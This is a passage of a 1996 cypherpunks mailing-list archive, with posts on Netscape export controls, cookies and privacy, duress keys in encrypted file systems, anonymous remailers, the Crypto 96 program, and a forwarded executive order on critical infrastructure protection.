 order. (Itar-Tass, Interfax, July 16)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Thu, 18 Jul 1996 12:35:38 +0800
To: jsw@netscape.com
Subject: Re: Netscape download requirements
In-Reply-To: <31ED5EEF.5AA3@netscape.com>
Message-ID: <199607172234.PAA09275@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>   Because we have not yet been able to obtain the address verification
> databases that we need for Canada.  There is someone working on
> tracking this down right now.  When we get the proper database we
> will add access to canada.

	Have you considered selling this export verification system?

-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Thu, 18 Jul 1996 13:43:11 +0800
To: cypherpunks@toad.com
Subject: Fw: Re: US versions of Netscape now available
Message-ID: <199607172236.PAA15899@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Wed Jul 17 17:36:57 1996

- -----Begin Included Message ----- 

Date: 
 From: 
To: remailer@yap.pactitle.com
Cc: cypherpunks@toal.com

To: remailer@yap.pactitle.com, cypherpunks@toal.com
Date: Wed Jul 17 17:30:28 1996
Successfully downloaded and installed last night.  It tool a while for the 
transfer to commence though.

Lou Zirko


> > From: Tom Weinstein <tomw@netscape.com>
> > Date: Tue, 16 Jul 1996 11:56:51 -0700
> > 
> > Duncan Frissell wrote:
> > > 
> > > I'm glad too.  So how many minutes did it take to leak overseas?
> > 
> > I have heard no reports of it leaking overseas.
> 
> Have you heard any reports of anyone successfully downloading it
> period?  Netscape always times out in the middle of a download.  I
> think the server is so overloaded that it's actually impossible to
> download the software.
> 
> I sure wish there were an ftp site overseas somewhere, then I could
> actually get the damned thing.
> 
> 

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye


- ---- End of forwarded message ----
Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMe1rFMtPRTNbb5z9AQHjtwf+Mhz46IY3fImoeymgi5pINyxQ1ifhElJ0
xMlyAVQlaYQYYGTND/xue8Ig3C66eI2WhG4P6L3A1aEcwZNstqFoH90OPmBornPU
L8N/7wpVR0EK74Ptlt2cyDsCUYw6UTKjBz9Zue4jR1Y7nW/V8SLhGEPx5PAz/h+r
m3yNqgSi4YmKdy4gg35BbuSuSFKQG81iIjcipKYB1s67RORytzXG4kOsrptUHZNm
gzLFcR4ldlPw0O1vU3yY38lXi2DygllLZGCl4+HFSW5rnBvEEXeVo4yINqYepVkx
vsfoqKGrn2dQ6fWY0yQnPGi0O1mWGeDdTWzabJIvMG2AlM8AfP4hIA==
=cXnP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 18 Jul 1996 16:28:21 +0800
To: cypherpunks@toad.com
Subject: FTP SW to support PGP in OnNet
Message-ID: <Pine.GUL.3.94.960717153112.29629C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Seems the demise of PGP in favor of S/MIME has been somewhat exaggerated.
Blurb in this week's InfoWorld led me to
http://www.ftp.com/mkt_info/onnet32/tr-pgp.htm

It would be a mistake, though, to say that they have a clue:

  E-mail compatibility

     Most e-mail systems can send and receive only plain text (technically,
     7-bit ASCII characters). So PGP converts the encrypted information
     (which is 8-bit) into plain ASCII text using the radix-64 algorithm.

     This has a side effect that enhances security even when you don't use
     encryption. If you merely add authentication to the message, radix-64
     still converts the whole message using its own algorithm. The resulting
     message -- even though it's not securely encrypted -- looks garbled to
     the casual snoop.

D'Oh!

- -rich
 censor the internet! http://www.stanford.edu/~llurch/potw2/
 boycott fadetoblack! http://www.fadetoblack.com/prquest.htm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMe1rFJNcNyVVy0jxAQEZHQH/aDm0unOzogxpzm+Cj/XozLvLIhrwnTt8
JZR+KH1CVONifOhwCdQsEn7aoH4YbhbolaWZBH0FG99g2KHbGhmbMA==
=QSLW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 18 Jul 1996 15:49:56 +0800
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Surf-filter lists
Message-ID: <v0151010fae12ffcf3eae@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Fine, call it "blocking," "restricting access to," or "muzzling." My point
still stands.

-Declan


>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Tue, 16 Jul 1996, Declan McCullagh wrote:
>
>> More to the point, as I wrote at the end of the original CWD, it's a
>> bait-and-switch maneuver. Go after porn, they say, but the censor political
>> information.
>
>ARGH!  I've been keeping quiet about this for a while, but I thing I
>gotta say something before I throttle my Zip drive...
>
><rant>A Private organization cannot "censor" anything.  The fundamental
>definition of the word require some agent of the government take action
>to censor.  To accuse Surf-Watch, net-nanny, AOL, MSU, AT&T, or whatever
>of "censorship" accomplishes nothing except to make us look the
>fool.</rant>
>
>I agree that the problem with the "bait-and-switch" filtering of net
>materials by these various filtering packages needs to be addressed.  If I
>want to protect my kids from seeing alt.naughty.pictures, I shoudl still
>be able to unfilter political and health speech.  The real problem isn't
>censorship, it's disclosure by the makers of filtering packages about
>what exactly their packages are going to filter for me and my family.
>However, in the upcoming war of filtering packages (and it will get ugly)
>trade secrets are going to make any company hesitant to reveal what it is
>they are filtering and what criteria they are using to determine if
>something qualifies.
>
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: PGP Signed with PineSign 2.2
>
>iQCVAwUBMe0jezokqlyVGmCFAQH0SAP+ONXs2f4GxjIrC6cp2sc9CgTrebL4cBWB
>UqpH4H3UO0TiKZN4T6MGVC6kCA3OwQnd0DNC0f0D6+iZTPkwN228Am6ZH4+t9hZs
>OrmCbZCiWZipLfT1gphIHqFHSqIQ506LkkGgLK0gjsS2ahrI+cNYJA3yYBviMkB1
>zuj1KRJ+pMk=
>=ddI5
>-----END PGP SIGNATURE-----
>
>____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
>\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
> \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
>   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html
>
>-----BEGIN GEEK CODE BLOCK-----
>Version: 3.12
>GED/J d-- s:++>: a- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
>K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
>R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
>------END GEEK CODE BLOCK------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: oolid@acqic.org (Joseph L. Moll)
Date: Thu, 18 Jul 1996 12:31:57 +0800
To: cypherpunks@toad.com
Subject: blowfish bug
Message-ID: <2.2.32.19960717193943.006af820@mail.acquion.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone recap the reference to the Blowfish bug fix and where it is
and is not correct?  I have lost the emails that referenced this.


Best Regards,
---
Joseph L. (Joe) Moll, Greenville, SC  USA  mailto:oolid@acqic.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Thu, 18 Jul 1996 12:20:06 +0800
To: Mixmaster Mailing List <alt.privacy.anon-server@myriad.alias.net
Subject: New type2.list/pubring.mix
Message-ID: <Pine.NEB.3.93.960717155009.10656C-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	There is a new type2.list/pubring.mix combination on jpunix.com.
Of note is the new middleman remailer, Janet Reno (reno). welcome aboard!
The file are available by WWW at www.jpunix.com as well as by anonymous
FTP at ftp.jpunix.com.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMe1SvFOTpEThrthvAQGttgP+JxuFMaHByPlqjmsXu5oJJMbEGN+zZ1mY
qPBFWyiNVezGhg/8dE4ZCqPYpClLCMAFSXFPAlioFuZRjkJ2TvSH+a0E1s5oyeOP
zHJmc8+z7QlAbKYPRYdcX+KWzoXBtT01kUsi2AXm02vsaNP2HxKdSF8LviZn3YjA
AZorDmtOdPA=
=QqZJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Janet Reno <middleman@cyberpass.net>
Date: Thu, 18 Jul 1996 17:21:27 +0800
To: alt.privacy.anon-server@myriad.alias.net
Subject: New Middleman (reno)
Message-ID: <199607172303.QAA09932@rigel.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


ATTENTION *** ATTENTION *** ATTENTION *** ATTENTION

I'm proud to announce the birth of a new middleman remailer! This new 
remailer uses John Perry's middleman mixmaster code and is located at 
cyberpass.net thanks to Lance Cottrell. Here are the statistics:

NAME: Janet Reno
SHORTNAME: reno
ADDRESS: middleman@cyberpass.net
MIXMASTER KEY:
reno middleman@cyberpass.net b864a69c831f38593d24187122e954f6 2.0.3

-----Begin Mix Key-----
b864a69c831f38593d24187122e954f6
258
AASx+Qa23TBIu7MTGZQekob8EJrxyhNPYPBRhzZC
17F5scF1MzFIk1PhY0O78QN29aYMHlo99jE37Hlh
MvJpQ7HUrqnklRIaRZJBLxUcuBoTckMltIJEdh1r
9Lbh8e5AIoqPr6c9SAxr7Q3v2cthkwuBYEiWDlui
0vGtsX/EC6lTdwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

John Perry, will you please add my remailer to your list when you get a 
chance?

                                          middleman@cyberpass.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@berserk.com>
Date: Thu, 18 Jul 1996 14:57:26 +0800
To: cypherpunks@toad.com
Subject: Anyone knows TCFS ?
Message-ID: <199607171433.QAA01195@asylum.berserk.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone use or know off Transparent Cryptografic File System ?

More information available on URL http://mikonos.dia.unisa.it/tcfs

bEST Regards,
--
  Alex de Joode   | Berserk Consultancy   --   Diemen, The Netherlands
usura@berserk.com | mailto:info@berserk.com    http://www.berserk.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 18 Jul 1996 10:31:41 +0800
To: cypherpunks@toad.com
Subject: Re: Cookie alternatives
In-Reply-To: <199607161607.JAA08875@jobe.shell.portal.com>
Message-ID: <v03007603ae1327cc0040@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:07 AM -0700 7/16/96, Hal wrote:
>There has been quite a bit of discussion recently about the "cookies"
>used by Netscape Navigator and their effects on privacy of users.  Here
>is some background and some thoughts on alternatives.

<omitted>

Other uses of cookies include keeping track of pages you've already
seen/done in a sequential information web site, or in a registration
procedure; or validation of registered users and their expiry dates
(perhaps encrypted with protective data elements to prevent cookie sharing)
to avoid having to refer to a data base and slow the interaction down each
new time. I've seen some sites which appear to pass you a cookie after
you're registered, and in future take you directly to the "operational"
first page (such as the front page of a newspaper).

It's also possible to store personal data, such as the size of your largest
order to date or some such, or whether you've bounced any checks/credit
card transactions--so you get different treatment depending on your past
history. The uses are almost as varied as the mind of the server's
operators.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 18 Jul 1996 10:50:49 +0800
To: cypherpunks@toad.com
Subject: Crypto 96
Message-ID: <199607172345.QAA08995@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Crypto 96 is coming up in about a month.  This looks like a more
interesting program than last year, IMO.  According to the preliminary
program, here are some presentations which could be of interest to
cypherpunks:

Anonymous Communication and Anonymous Cash
   Daniel Simon, Microsoft, USA
   
	Microsoft has had an increasing presence at the crypto
	conferences so it will be interesting to hear what their take
	is on anonymity.  Any Microsofties on the list want to comment?

Export Controls: Past, Present, and Future
   Andy Clark, Independent consultant

	This is an invited lecture just before lunch.  I don't know
	who Andy Clark is, can anyone identify him?

The Dark Side of 'Black-Box' Cryptography, or: Why Should We Trust Capstone?
   Adam Young, Columbia Univ., USA
   Moti Yung, IBM, USA

	It's not clear what the technical content will be of this,
	maybe ways to embed trap doors when black boxes are used.
	Generally the crypto conference attendees have varied views on
	our issues and there are often presentations about great new
	forms of key escrow, etc.  So it is always nice to see some
	which sound like they favor privacy.

Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and
Other Systems
   Paul Kocher, Stanford, USA

	This is the famous Kocher timing attack which got so much
	attention a few months ago.

[title to be announced]
   Cliff Stoll

	Another invited lecture.  Stoll is famous for being skeptical
	about the value of the net.  I think his politics are old-
	fashioned liberal.  So it will be interesting to hear what his
	take is on the encryption debates.

Relation of Theory to Practice in Cryptography [exact title to be announced]
   Ron Rivest, MIT, USA

	Yet another invited lecture.  I didn't remember there being so
	many before.  Actually I thought Rivest gave one last year.
	This working title doesn't sound too informative.

Family Crypto
   led by Michael Fellows

	This takes up the Tuesday afternoon session, and is supposed
	to be suitable for kids, lay people, etc., to teach them
	something about crypto.  I am lucky enough to live very near
	the site of the conference so I will bring my kids to check
	this out.  It is something new.

Key-Schedule Cryptanalysis of IDEA, G-DES, GOST, SAFER, and Triple-DES
   John Kelsey, Counterpane Systems, USA
   Bruce Schneier, Counterpane Systems, USA
   David Wagner, Univ. California at Berkeley, USA

	There are actually several cryptanalysis type papers for which
	I can't tell from the title whether they will be big new
	results or not.  Anybody know what "key schedule" cryptanalysis
	is?

Cryptographic applications in electronic commerce
   Ernest Brickell

	An invited lecture.  Interesting to see so many practically
	oriented talks.

Cryptology, Technology, and Politics
   Whitfield Diffie

	Invited lecture.  Diffie is of course strongly dedicated to
	our views.  At the same time he presents himself very well and
	is always thoughtful.

Quantum Cryptography over Underground Optical Fibers
   R. J. Hughes, Los Alamos National Labs, USA
   G. G. Luther, Los Alamos National Labs, USA
   G. L. Morgan, Los Alamos National Labs, USA
   C. G. Peterson, Los Alamos National Labs, USA
   C. Simmons, Los Alamos National Labs, USA

	I don't particularly think quantum crypto is that relevant to
	us but it will be interesting to hear about progress.  There
	is actually a session on QC with this paper and another.

New Results on Visual Cryptography
   Stefan Droste, Univ. Dortmund, Germany

	Visual cryptography is another novel idea involving non
	electronic encryption done by putting transparencies together
	in various ways.  Maybe it could have some stego applications.


Overall this conference looks very exciting, with possibly a more
political and practical orientation than some.  I am looking forward
to seeing other cypherpunks there.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@issl.atl.hp.com>
Date: Thu, 18 Jul 1996 16:35:44 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: Cookie alternatives
In-Reply-To: <199607161607.JAA08875@jobe.shell.portal.com>
Message-ID: <199607172056.QAA15431@jafar.issl.atl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:

> However I think in current usage on the web cookies are most commonly
> used basically as nonces, random values whose purpose is to maintain
> continuity in a series of interactions.  When a server gives a cookie
> to a web browser, that browser supplies the cookie on future
> interactions with the server.  The cookie probably does not have any
> specific data about the user or the interaction, but is used only to
> link up the interactions which take place.  It is most probably used as
> an index into a database maintained on the server itself.
[ snip ]
> As a user of the web, I would prefer to have more control over the kind
> of information which servers gather about my browsing habits.
[ snip ]
>                                          Nevertheless to the extent
> that I have bargaining clout in these interactions, I will prefer
> systems which do not infringe so much upon my privacy.
> 
> It is interesting to consider how shopping carts might be done without
> cookies and similar technologies which allow servers to get more
> information about me than necessary.

I think you're exactly right about how cookies are used, but I believe
privacy concerns stemming from cookies have been blown out of proportion
lately.  For the average Joe User running his single-user PC at home,
connected by modem to his local ISP, it makes little difference whether
a site issues a cookie to Joe or not; his IP address already uniquely
distinguishes him.  The site can simply use his IP address as its
database index.  If Joe deletes his cookie file each night before
invoking the browser, the impact of cookies is completely negated.

Now for those of us who access the net from multi-user systems or from
behind a firewall, the cookie uniquely identifies a particular browser
instance -- that is, it makes us equal to Joe.  And that's the reason
cookies were invented in the first place: because IP address and other
information available to the server didn't provide a unique server
database index.

I don't mean there are no privacy implications at all, and there are 
clearly other ways of accomplishing the cookie's function.  My point is
that merely removing cookies doesn't really help Joe's privacy much.
And it's Joe we ought to be concerned about as he represents the typical
user of today as well as the future.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 18 Jul 1996 14:16:39 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Opiated file systems
Message-ID: <199607172125.RAA09158@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 16 Jul 96 at 19:21, Mark M. wrote:

> > A problem with a c'punk-style encrypted fs with source code and wide 
> > distribution is, of course, that attackers will KNOW that there is a 
> > duress key.
> 
> I don't see how this would effect the security of such a filesystem.  There
> is absolutely nothing that an attacker can do to get the real key.  An attacker
> would just ignore all computers that have duress key capability.

1. Confiscate computer (along with physical drive) with duress-capable
encrypted file system; 2. back up the encrypted sectors; 3. reverse-engineer file 
system driver to figure out how the duress-key works, if there are 
multiple keys, where data is stored; 4. make sure you've rubber-hosed 
or subpeoned all passphrases or keys; 4a. if the system destroys data, 
you've got backups ("Very funny kiddo; now give us the real key...")
4b. even if there are two filesystems, the attacker will want access 
to both, just to make sure...

Duress keys rely on a form of security through obscurity.

They make sense for real-time situations where the attacker has to 
rush in, gain access quickly, and leave real fast (ie, bank 
robberies).   If the attacker has plenty of time, he can prepare for 
that possibility.

Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 18 Jul 1996 14:26:46 +0800
To: jim@ACM.ORG
Subject: Re: Opiated file systems
Message-ID: <199607172125.RAA09155@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 16 Jul 96 at 13:30, Jim Gillogly wrote:

> "Deranged Mutant" <WlkngOwl@unix.asb.com> writes:
> >A problem with a c'punk-style encrypted fs with source code and wide 
> >distribution is, of course, that attackers will KNOW that there is a 
> >duress key.
> 
> Good point.  This suggests a design desideratum for any such system should
> be that the user may choose not to have a duress key, maintaining
> semi-plausible deniability for those who choose to have one.

Semi-plausible. (See my other reply to this: an attacker could get 
ahold of the HD and your system, reverse engineer the driver used, to 
see what you're doing; backups of the encrypted partition in case of 
destructive measures are helpful ... they could even return your 
computer to you and take it apart carefully.)

The problem with a duress key is that it relies on "security through 
obscurity".

Rob.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Thu, 18 Jul 1996 11:14:53 +0800
To: cypherpunks@toad.com
Subject: Privacy tales
Message-ID: <199607180016.RAA29667@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


While most of my crypto-activism efforts have involved writing code like
Private Idaho, I've decided it's time to branch out a little, and play scribe.

I'm going to be actively compiling what I hope will be the definitive source
of worldwide case studies that demonstrate the benefits of Internet privacy
tools.  We've all heard the Burma and Eastern Europe stories from Phil, but
there have to be a whole lot more like them out there.  I'm looking for
stories with a human focus, that clearly show the importance of PGP,
anonymous remailers, and other tools to cultural, economic, and political
processes.

The goal is to have a body of evidence that can easily be tossed back at the
anti-crypto folks, when they trot out the Four Horsemen.  It would be great
to have hundreds of examples of crypto et. al. benefitting society, to the
few cases the government pulls out of its hat.

I plan on organizing and publishing selected accounts at my Web site as I
get them (specific details may be altered to protect identities).

I'm going to be cross-posting to a variety of newsgroups and lists to
publicize this.  I'd appreciate your help in spreading the word around.

If you have a story to tell, or know someone who does, I'd like to hear it.
It doesn't have to be an exciting "rebels in the jungle" account either.  In
many ways, the everyday slice of life stories may be more important.

See http://www.eskimo.com/~joelm/privacy.html for details.  (And yes, I talk
about ways to maintain your privacy and anonymity if you want to contact me.)

Joel McNamara
joelm@eskimo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Fri, 19 Jul 1996 12:34:17 +0800
To: "'cypherpunks@toad.com>
Subject: Reverse Engineer
Message-ID: <01BB752B.7DCF4600@ip65.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


What do you mean by "reverse engineer?" I have heard this word several times especially in the world of hacking, but... can someone tell me what it really meant?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Fri, 19 Jul 1996 11:43:56 +0800
To: "'cypherpunks@toad.com>
Subject: Home Made Telephone Voice Changer
Message-ID: <01BB752B.7FF7A440@ip65.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know how to make a home-made telephone voice changer?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Thu, 18 Jul 1996 16:54:24 +0800
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Surf-filter lists
In-Reply-To: <Pine.ULT.3.91.960717142418.2660A-100000@krypton.mankato.msus.edu>
Message-ID: <31ED710A.1756@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert A. Hayden wrote:

> <rant>A Private organization cannot "censor" anything.  The fundamental
> definition of the word require some agent of the government take action
> to censor.  

I think you need a new dictionary.  I don't see any reason why I shouldn't
use the word "censor" to describe the action of a parent clipping articles
from "Weekly Reader", for example.

Whether some instance of censorship is interesting in a legal sense of
course hinges on whether a government is involved.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 18 Jul 1996 12:29:07 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199607180110.SAA15188@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know how to tanslate PGP into Burmese?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 18 Jul 1996 13:51:23 +0800
To: cypherpunks@toad.com
Subject: Gorelick testifies before Senate, unveils new executive order
Message-ID: <Pine.SUN.3.91.960717184531.7324A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Wed, 17 Jul 1996 15:54:24 -0500
From: Declan McCullagh <declan@well.com>
To: fight-censorship+@andrew.cmu.edu
Subject: Gorelick testifies before Senate, unveils new executive order

Deputy Attorney General Jamie Gorelick testified yesterday before Sen.
Sam Nunn's cyberscare hearing (take #3), where she ranted about the
evils of the Net and unveiled an executive order signed by the
president on Monday.

Gorelick, the administration's newly-annointed chief Net fearmonger,
said: "The executive order is on Federal Information Infrastructure
protection... It creates a committee to draft policy and recommend
legislation. The order cites two types of threats: physical and cyber."

The infrastructure she's talking about isn't government computers; she
means the private sector. "Because this infrastructure is privately
owned, this [executive order] emphasizes and recognizes the importance
of cooperation."

That is, cooperation with the fear of government regulation hanging
over your head. The President's Commission on Critical Infrastructure
Protection, which will have an industry advisory panel, has one year to
report back with recommendations.

Sen. Patrick Leahy testified: "Armed with a modem and a computer, a
criminal can wreak havoc on our computers from anywhere in the world.
There are no borders in cyberspace... Existing criminal statutes
provide a good framework for prosecuting [some] computer offenses... We
have to assume we have to update our criminal code."

Clinton's executive order also creates a "Infrastructure Protection
Task Force," effective immediately, with reps from the FBI, DOD, and
NSA. At yesterday's Senate permanent subcommittee on investigations
hearing, Gorelick ducked Sen. Nunn's questions about the limits of the
task force's authority. But the executive order says the group must:

      (i)     provide, or facilitate and coordinate the provision of,
              expert guidance to critical infrastructures to detect,
              revent, halt, or confine an attack and to recover and restore
              service...
      (v)     coordinate with the pertinent law enforcement authorities
              during or after an attack to facilitate any resulting
              criminal investigation.

"Critical infrastructures" include telecommunications facilities and
the Net.

-Declan

PS: For background, check out:
  http://www.netizen.com/netizen/96/29/campaign_dispatch0a.html




Critical infrastructures:

 1. telecommunications;
 2. electrical power systems;
 3. gas and oil storage and transportation;
 4. banking and finance;
 5. transportation;
 6. water supply systems;
 7. emergency services (including medical, police, fire and rescue); and
 8. continuity of government.




                          EXECUTIVE ORDER

                           - - - - - - -

                 CRITICAL INFRASTRUCTURE PROTECTION

      Certain national infrastructures are so vital that their incapacity
 or destruction would have a debilitating impact on the defense or economic
 security of the United States.  These critical infrastructures include
 telecommunications, electrical power systems, gas and oil storage and
 transportation, banking and finance, transportation, water supply systems,
 emergency services (including medical, police, fire and rescue), and
 continuity of government.  Threats to these critical infrastructures fall
 into two categories: physical threats to tangible property ("physical
 threats"), and threats of electronic, radio-frequency, or computer-based
 attacks on the information or communications components that control
 critical infrastructures ("cyber threats").  Because many of these
 critical infrastructures are owned and operated by the private sector, it
 is essential that the government and private sector work together to
 develop a strategy for protecting them and assuring their continued
 operation.

      NOW, THEREFORE, by the authority vested in me as President by the
 Constitution and the laws of the United States of America, it is hereby
 ordered as follows:

      Section 1.  Establishment.  There is hereby established the
 President's Commission on Critical Infrastructure Protection
 ("Commission").
      (a) Chair.  A qualified individual from outside the Federal
 Government shall be appointed by the President to serve as Chair of the
 Commission.  The Commission Chair shall be employed on a full-time basis.
      (b) Members.  The head of each of the following executive branch
 departments and agencies shall nominate not more than two full-time
 members of the Commission:
      (i)     Department of the Treasury;
      (ii)    Department of Justice;
      (iii)   Department of Defense;
      (iv)    Department of Commerce;
      (v)     Department of Transportation;
      (vi)    Department of Energy;
      (vii)   Central Intelligence Agency;
      (viii)  Federal Emergency Management Agency;
      (ix)    Federal Bureau of Investigation;
      (x)     National Security Agency.
      One of the nominees of each agency may be an individual from outside
 the Federal Government who shall be employed by the agency on a full-time
 basis.  Each nominee must be approved by the Steering Committee.

      Sec. 2.  The Principals Committee.  The Commission shall report to
 the President through a Principals Committee ("Principals Committee"),
 which shall review any reports or recommendations before submission tot he
 President.  The Principals Committee shall comprise the:
      (i)     Secretary of the Treasury;
      (ii)    Secretary of Defense;
      (iii)   Attorney General;
      (iv)    Secretary of Commerce;
      (v)     Secretary of Transportation;
      (vi)    Secretary of Energy;
      (vii)   Director of Central Intelligence;
      (viii)  Director of the Office of Management and Budget;
      (ix)    Director of the Federal Emergency Management Agency;
      (x)     Assistant to the President for National Security Affairs;
      (xi)    Assistant to the Vice President for National Security
              Affairs.

      Sec. 3.  The Steering Committee of the President's Commission on
 Critical Infrastructure Protection.  A Steering Committee ("Steering
 Committee") shall oversee the work of the Commission on behalf of the
 Principals Committee.  The Steering Committee shall comprise four members
  appointed by the President.  One of the members shall be the Chair of the
 Commission and one shall be an employee of the Executive Office of the
 President.  The Steering Committee will receive regular reports on the
 progress of the Commission's work and approve the submission of reports to
 the Principals Committee.

      Sec. 4.  Mission.  The Commission shall:  (a) within 30 days of this
 order, produce a statement of its mission objectives, which will elaborate
 the general objectives set forth in this order, and a detailed schedule
 for addressing each mission objective, for approval by the Steering
 Committee;
      (b) identify and consult with:  (i) elements of the public and
 private sectors that conduct, support or contribute to infrastructure
 assurance; (ii) owners and operators of the critical infrastructures; and
 (iii) other elements of the public and private sectors, including the
 Congress, that have an interest in critical infrastructure assurance
 issues and that may have differing perspectives on these issues;
      (c) assess the scope and nature of the vulnerabilities of, and
 threats to, critical infrastructures;
      (d) determine what legal and policy issues are raised by efforts to
 protect critical infrastrucutres and assess how these issues should be
 addressed;
      (e) recommend a comprehensive national policy and implementation
 strategy for protecting critical infrastructures from physical and cyber
 threats and assuring their continued operation;
      (f) propose any statutory or regulatory changes necessary to effect
 its recommendations; and
      (g) produce reports and recommendations to the Steering Committee as
 they become available; it shall not limit itself to producing one final
 report.

      Sec. 5.  Advisory Committee to the President's Commission on Critical
 Infrastructure Protection.  (a) The Commission shall receive advice from
 an advisory committee ("Advisory Committee") composed of no more than ten
 individuals appointed by the President from the private sector who are
 knowledgeable about critical infrastructures.  The Advisory Committee
